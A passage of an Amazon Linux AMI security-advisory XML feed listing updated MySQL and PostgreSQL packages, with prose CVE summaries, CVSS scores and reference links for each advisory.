arch="x86_64"><filename>Packages/mysql56-server-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.42-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1116</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1116: medium priority package update for mysql55</title><issued date="2018-12-06 00:40:00" /><updated date="2018-12-07 01:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.62-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1117</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1117: important priority package update for postgresql93 postgresql94</title><issued date="2018-12-06 16:55:00" /><updated date="2018-12-07 01:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-server" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.25-1.72.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.25-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1118</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1118: important priority package update for postgresql95</title><issued date="2018-12-06 16:57:00" /><updated date="2018-12-07 01:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-static" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.15" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.15-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.15-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.15" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.15-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1119</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1119: important priority package update for postgresql96</title><issued date="2018-12-06 16:58:00" /><updated date="2018-12-07 01:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1115:
It was found that pg_catalog.pg_logfile_rotate(), from the adminpack extension, did not follow the same ACLs than pg_rorate_logfile. If the adminpack is added to a database, an attacker able to connect to it could use this flaw to force log rotation.
1573276:
CVE-2018-1115 postgresql: Too-permissive access control list on function pg_logfile_rotate()
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1115" title="" id="CVE-2018-1115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-contrib" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.11" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.11-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.11" release="1.82.amzn1" epoch="0" 